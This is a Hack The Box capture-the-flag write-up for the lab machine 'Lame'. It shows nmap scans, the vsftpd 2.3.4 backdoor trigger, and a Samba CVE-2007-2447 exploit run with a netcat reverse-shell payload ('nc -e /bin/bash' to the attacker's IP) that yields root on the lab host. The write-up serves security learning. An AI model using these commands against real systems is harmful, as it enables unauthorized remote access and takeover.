HTB: Lame – Writeup

Details

This machine is Lame from the Hack The Box, and is a retired machine. It's IP was 10.10.10.3

Recon Phase

Knowing the system was on 10.10.10.3 I carried out an nmap scan to take a look

root@kali:~# nmap -sV 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.13s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.26 seconds

Shell Hunting

vsftp 2.3.4 has a known backdoor, where if your username ends in ":)" a bind shell will be created on port 6200, so I tried it out. Unfortunately it didn't work so this version must be patched. Moving on I carried out another Nmap scan this time letting it run some enumeration scripts for more details

root@kali:~# nmap -sVC 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-16 09:28 EST
Nmap scan report for 10.10.10.3
Host is up (0.20s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.16
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d21h56m17s, deviation: 0s, median: -2d21h56m17s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-01-13T06:32:49-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

This revealed the Samba version as being 3.0.20-Debian which has a known RCE vuln, CVE-2007-2447. There is a metasploit module for this, but while I'm learning I prefer to do it myself, so I implemented a copy of the exploit https://github.com/Jack-Barradell/exploits/blob/master/CVE-2007-2447/cve-2007-2447.py and setup a listener to receive the shell

root@kali:~# nc -nvlp 4444

The ran the exploit

root@kali:~# python3 cve-2007-2447.py -t 10.10.10.3 -p 445 -c "nc -e /bin/bash 10.10.14.16 4444"
[+] Generating exploit
[+] Exploit sent

And looked back in my listener

connect to [10.10.14.16] from (UNKNOWN) [10.10.10.3] 43358

A shell connected back, so I tested it

# id
uid=0(root) gid=0(root)

It's a root shell so I can grab the flags

# cd /home
# ls -la
drwxr-xr-x  6 root    root    4096 Mar 14  2017 .
drwxr-xr-x 21 root    root    4096 May 20  2012 ..
drwxr-xr-x  2 root    nogroup 4096 Mar 17  2010 ftp
drwxr-xr-x  4 makis   makis   4096 Jan 11 06:25 makis
drwxr-xr-x  2 service service 4096 Apr 16  2010 service
drwxr-xr-x  3    1001    1001 4096 May  7  2010 user
# cd makis
# ls -la
drwxr-xr-x 4 makis makis 4096 Jan 11 06:25 .
drwxr-xr-x 6 root  root  4096 Mar 14  2017 ..
-rw------- 1 makis makis 1107 Mar 14  2017 .bash_history
-rw-r--r-- 1 makis makis  220 Mar 14  2017 .bash_logout
-rw-r--r-- 1 makis makis 2928 Mar 14  2017 .bashrc
drwx------ 2 makis makis 4096 Jan 13 06:25 .gconf
drwx------ 2 makis makis 4096 Jan 13 06:25 .gconfd
-rw-r--r-- 1 makis makis  586 Mar 14  2017 .profile
-rw-r--r-- 1 makis makis    0 Mar 14  2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis   33 Mar 14  2017 user.txt
# cat user.txt
[REDACTED]

That's the user flag, now for the root flag

# cd /root
# ls -la
drwxr-xr-x 13 root root 4096 Jan 10 22:30 .
drwxr-xr-x 21 root root 4096 May 20  2012 ..
-rw-------  1 root root  373 Jan 10 22:30 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
drwx------  3 root root 4096 May 20  2012 .config
drwx------  2 root root 4096 May 20  2012 .filezilla
drwxr-xr-x  5 root root 4096 Jan 10 22:30 .fluxbox
drwx------  2 root root 4096 May 20  2012 .gconf
drwx------  2 root root 4096 May 20  2012 .gconfd
drwxr-xr-x  2 root root 4096 May 20  2012 .gstreamer-0.10
drwx------  4 root root 4096 May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4096 May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4096 May 20  2012 .ssh
drwx------  2 root root 4096 Jan 10 22:30 .vnc
drwxr-xr-x  2 root root 4096 May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-------  1 root root   33 Mar 14  2017 root.txt
-rw-r--r--  1 root root  118 Jan 10 22:30 vnc.log
# cat root.txt
[REDACTED]

And the machine is completed!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.